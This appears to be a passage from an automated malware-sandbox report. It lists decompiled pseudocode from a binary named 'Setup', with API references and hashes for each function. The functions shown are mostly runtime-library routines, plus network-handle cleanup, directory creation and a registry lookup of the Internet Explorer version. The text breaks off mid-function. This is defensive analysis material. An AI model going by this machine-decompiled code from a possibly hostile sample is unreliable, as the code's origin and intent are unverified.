                                                                                                                                                              						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                                                                                                                                              					} else {
                                                                                                                                                              						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                                                                                                                                              						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                                                                                                                                              							E00451D90(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                                                                                                                                              							_t34 = _t34 + 0xc;
                                                                                                                                                              						}
                                                                                                                                                              						 *((intOrPtr*)(E00454477(_t41))) = 0x16;
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(0);
                                                                                                                                                              						E004557A5(_t29, _t30, 0);
                                                                                                                                                              						goto L6;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return E004568A5(_t19);
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __lock_file_memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 26237723-0
                                                                                                                                                              • Opcode ID: 37ef9b4903a69fa08c2e22f251cd5e38d13e6d41c0040cdc2554639083a2e4eb
                                                                                                                                                              • Instruction ID: d7dfcb793dc1720f97a4c8db5cdb919cf0c013a247f2a2882a06d8a2a7a3e963
                                                                                                                                                              • Opcode Fuzzy Hash: 37ef9b4903a69fa08c2e22f251cd5e38d13e6d41c0040cdc2554639083a2e4eb
                                                                                                                                                              • Instruction Fuzzy Hash: 37018071C41209EBCF61AFA1D8028DE3B70BF5476AF00411AFC1459163D3398AAAEBD9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00454569(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				signed int _t18;
                                                                                                                                                              				signed int _t20;
                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                              				void* _t32;
                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                              
                                                                                                                                                              				_push(0xc);
                                                                                                                                                              				_push(0x544298);
                                                                                                                                                              				E00456860(__ebx, __edi, __esi);
                                                                                                                                                              				 *(_t32 - 0x1c) =  *(_t32 - 0x1c) | 0xffffffff;
                                                                                                                                                              				_t31 =  *((intOrPtr*)(_t32 + 8));
                                                                                                                                                              				_t36 = _t31;
                                                                                                                                                              				_t37 = _t36 != 0;
                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                              					__eflags =  *(_t31 + 0xc) & 0x00000040;
                                                                                                                                                              					if(( *(_t31 + 0xc) & 0x00000040) == 0) {
                                                                                                                                                              						E0045D801(_t31);
                                                                                                                                                              						 *((intOrPtr*)(_t32 - 4)) = 0;
                                                                                                                                                              						_t18 = E004544F2(__edx, _t31); // executed
                                                                                                                                                              						 *(_t32 - 0x1c) = _t18;
                                                                                                                                                              						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                                                                                                                                                              						E004545DD(_t31);
                                                                                                                                                              					} else {
                                                                                                                                                              						 *(_t31 + 0xc) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t20 =  *(_t32 - 0x1c);
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(E00454477(_t37))) = 0x16;
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_t20 = E004557A5(__edx, 0, _t31) | 0xffffffff;
                                                                                                                                                              				}
                                                                                                                                                              				return E004568A5(_t20);
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00454477: __getptd_noexit.LIBCMT ref: 00454477
                                                                                                                                                                • Part of subcall function 004557A5: __decode_pointer.LIBCMT ref: 004557B0
                                                                                                                                                              • __lock_file.LIBCMT ref: 004545B9
                                                                                                                                                                • Part of subcall function 0045D801: __lock.LIBCMT ref: 0045D826
                                                                                                                                                              • __fclose_nolock.LIBCMT ref: 004545C3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 717694121-0
                                                                                                                                                              • Opcode ID: e8809228c1312b64c1facbe8e66023ba57e1e74e3ceb212012b6ea9c4ce00062
                                                                                                                                                              • Instruction ID: e4cb9d1e5c9697cfff4e0b800dbd3b9f6b75d0fe3744077fef0c531a8bdeec8e
                                                                                                                                                              • Opcode Fuzzy Hash: e8809228c1312b64c1facbe8e66023ba57e1e74e3ceb212012b6ea9c4ce00062
                                                                                                                                                              • Instruction Fuzzy Hash: CCF0F470801608A7C720BB6A880165E7AA06F8133EF61820AED759B1C3DA3C458A8B1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004EDD10(void** __ecx) {
                                                                                                                                                              				void** _v8;
                                                                                                                                                              				void** _t13;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				if(_v8[1] != 0) {
                                                                                                                                                              					InternetCloseHandle(_v8[1]); // executed
                                                                                                                                                              				}
                                                                                                                                                              				if( *_v8 != 0) {
                                                                                                                                                              					InternetCloseHandle( *_v8);
                                                                                                                                                              				}
                                                                                                                                                              				_t13 = _v8;
                                                                                                                                                              				 *_t13 = 0;
                                                                                                                                                              				_v8[1] = 0;
                                                                                                                                                              				return _t13;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004EDD27
                                                                                                                                                              • InternetCloseHandle.WININET ref: 004EDD3B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleInternet
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1081599783-0
                                                                                                                                                              • Opcode ID: 5d7717c1b9295ea8faa2cc6d646949c8e008cc71e97655b22e0b5ad4ad0d7d83
                                                                                                                                                              • Instruction ID: 954ac52303eef577f79202d418b083c80d2e3be7494a3a46e7203f2e1600ef05
                                                                                                                                                              • Opcode Fuzzy Hash: 5d7717c1b9295ea8faa2cc6d646949c8e008cc71e97655b22e0b5ad4ad0d7d83
                                                                                                                                                              • Instruction Fuzzy Hash: 9CF0AC74901208EFDB04CF94DA94F9EB7F5EB49305F2481D9E8055B3A0C776AE41EB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0049E610(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				int _t10;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t10 = CreateDirectoryW(E00416A30(_a4 + 4), 0); // executed
                                                                                                                                                              				_v8 = _t10;
                                                                                                                                                              				if(_v8 == 0 && _a8 != 0) {
                                                                                                                                                              					 *_a8 = GetLastError();
                                                                                                                                                              				}
                                                                                                                                                              				return 0 | _v8 != 0x00000000;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,004D6543,?,00000000,00000000,00000000,DDD124F9), ref: 0049E622
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0049E637
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                              • Opcode ID: 3b25b2bf652a9b564b26553f7980285f893cc1f46bad78e318f9c7318d09db0f
                                                                                                                                                              • Instruction ID: 6ed70589b5ef52341549c58a9c58e01730df6f24d26f59066d9767976b0fcf79
                                                                                                                                                              • Opcode Fuzzy Hash: 3b25b2bf652a9b564b26553f7980285f893cc1f46bad78e318f9c7318d09db0f
                                                                                                                                                              • Instruction Fuzzy Hash: 38E01A3050120CEFEF04DFA1C81D7AD7BA9EB18319F14C5AAE80657280E7799F94DE55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00451F02(void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              
                                                                                                                                                              				_t21 = __eflags;
                                                                                                                                                              				E00456860(_t12, __edi, __esi);
                                                                                                                                                              				_t8 = E00457400(_t12, __edx, __edi, _t21);
                                                                                                                                                              				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                                                                                                                                                              				E00451EC5( *((intOrPtr*)(_t8 + 0x54))( *((intOrPtr*)(_t8 + 0x58)), 0x5441d8, 0xc)); // executed
                                                                                                                                                              				 *((intOrPtr*)(_t20 - 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14))))));
                                                                                                                                                              				return E0045B73E(_t12,  *(_t20 - 4),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14)))))),  *((intOrPtr*)(_t20 - 0x14)));
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 00451F0E
                                                                                                                                                                • Part of subcall function 00457400: __getptd_noexit.LIBCMT ref: 00457403
                                                                                                                                                                • Part of subcall function 00457400: __amsg_exit.LIBCMT ref: 00457410
                                                                                                                                                                • Part of subcall function 00451EC5: __IsNonwritableInCurrentImage.LIBCMT ref: 00451ED8
                                                                                                                                                                • Part of subcall function 00451EC5: __getptd_noexit.LIBCMT ref: 00451EE8
                                                                                                                                                                • Part of subcall function 00451EC5: __freeptd.LIBCMT ref: 00451EF2
                                                                                                                                                                • Part of subcall function 00451EC5: ExitThread.KERNEL32 ref: 00451EFB
                                                                                                                                                              • __XcptFilter.LIBCMT ref: 00451F2F
                                                                                                                                                                • Part of subcall function 0045B73E: __getptd_noexit.LIBCMT ref: 0045B746
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 393088965-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0045799C(int _a4) {
                                                                                                                                                              
                                                                                                                                                              				E00457971(_a4);
                                                                                                                                                              				ExitProcess(_a4);
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 004579A4
                                                                                                                                                                • Part of subcall function 00457971: GetModuleHandleW.KERNEL32(mscoree.dll,?,004579A9,?,?,0044FC12,000000FF,0000001E,?,00457755,?,00000001,?,?,00457D86,00000018), ref: 0045797B
                                                                                                                                                                • Part of subcall function 00457971: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0045798B
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004579AD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2427264223-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00417CF0(void* __eflags, signed int _a4, char _a8) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t49;
                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				char _t72;
                                                                                                                                                              				signed int _t106;
                                                                                                                                                              				void* _t107;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x514280);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t72);
                                                                                                                                                              				_t49 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t49 ^ _t106);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t107 - 0xc;
                                                                                                                                                              				_v32 = _t72;
                                                                                                                                                              				_v28 = _a4 | 0x00000007;
                                                                                                                                                              				if(E00417AF0(_v32) >= _v28) {
                                                                                                                                                              					if(_v28 / 3 <  *(_v32 + 0x18) >> 1 &&  *(_v32 + 0x18) <= E00417AF0(_v32) - ( *(_v32 + 0x18) >> 1)) {
                                                                                                                                                              						_v28 = ( *(_v32 + 0x18) >> 1) +  *(_v32 + 0x18);
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_v28 = _a4;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t59 = E00417CD0(_v32, _v28 + 1); // executed
                                                                                                                                                              				_v24 = _t59;
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				if(_a8 > 0) {
                                                                                                                                                              					E00418000(_v28 + 1, _v24, _v28 + 1, E00418030(_v32), _a8);
                                                                                                                                                              				}
                                                                                                                                                              				E00417E70(_v32, 1, 0);
                                                                                                                                                              				 *((intOrPtr*)(_v32 + 4)) = _v24;
                                                                                                                                                              				 *(_v32 + 0x18) = _v28;
                                                                                                                                                              				_t63 = E00418080(_v32, _a8);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t63;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00417AF0: allocator.LIBCPMTD ref: 00417AFC
                                                                                                                                                              • allocator.LIBCPMTD ref: 00417D98
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0041EDE0(void** __ecx, short* _a4, char* _a8, unsigned int* _a12) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				void** _v20;
                                                                                                                                                              				long _t35;
                                                                                                                                                              
                                                                                                                                                              				_v20 = __ecx;
                                                                                                                                                              				do {
                                                                                                                                                              				} while (0 != 0 || 0 != 0);
                                                                                                                                                              				_v12 =  *_a12 << 1;
                                                                                                                                                              				 *_a12 = 0;
                                                                                                                                                              				_t35 = RegQueryValueExW( *_v20, _a4, 0,  &_v8, _a8,  &_v12); // executed
                                                                                                                                                              				_v16 = _t35;
                                                                                                                                                              				if(_v16 == 0) {
                                                                                                                                                              					if(_v8 == 1 || _v8 == 2) {
                                                                                                                                                              						if(_a8 == 0) {
                                                                                                                                                              							L15:
                                                                                                                                                              							 *_a12 = _v12 >> 1;
                                                                                                                                                              							return 0;
                                                                                                                                                              						}
                                                                                                                                                              						if(_v12 == 0) {
                                                                                                                                                              							 *_a8 = 0;
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						if(_v12 % 2 != 0 || (_a8[(_v12 >> 1) * 2 - 2] & 0x0000ffff) != 0) {
                                                                                                                                                              							return 0xd;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						return 0xd;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
Memory Dump Source
• Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                              • Opcode ID: eab2924b431d68ee9115c4182a009e1237d85a4e1ed2f57fa7b1bca71f828541
                                                                                                                                                              • Instruction ID: be990d5a6d9182fce01ba0ffaa6c408bebd698dfed37db20f02eb68458331d30
                                                                                                                                                              • Opcode Fuzzy Hash: eab2924b431d68ee9115c4182a009e1237d85a4e1ed2f57fa7b1bca71f828541
                                                                                                                                                              • Instruction Fuzzy Hash: 2D214F78A00209EBDB18CF9AC444BEFB7B6EF98300F10855AEC1597390D7389A81CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E00433AC0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t26;
                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                              				signed int _t52;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5160c1);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t38);
                                                                                                                                                              				_t26 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t26 ^ _t52);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t53 - 0x14;
                                                                                                                                                              				_v36 = _t38;
                                                                                                                                                              				_t29 = E00433BF0(_v36 + 1, 1); // executed
                                                                                                                                                              				_v24 = _t29;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = E004144B0(0x34, _v24);
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				if(_v32 == 0) {
                                                                                                                                                              					_v40 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v40 = E00434540(_a4, _a8, _a12, _a16, _a20 & 0x000000ff);
                                                                                                                                                              				}
                                                                                                                                                              				_v28 = _v40;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v24;
                                                                                                                                                              			}


















                                                                                                                                                              APIs
Memory Dump Source
• Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 83640e26c94aebb76eba98aae00a5ad1b0284f78fbe020472ed44b087b7fb3e9
                                                                                                                                                              • Instruction ID: 4b0772133269115f449d225d50a6fdfeab6dc7638e8dbd230a6130781ab4af68
                                                                                                                                                              • Opcode Fuzzy Hash: 83640e26c94aebb76eba98aae00a5ad1b0284f78fbe020472ed44b087b7fb3e9
                                                                                                                                                              • Instruction Fuzzy Hash: 002138B1D04249EFDB04CF99D941BEEFBF8EB48714F20425AE915A7381D3796A00CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E004F8180(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
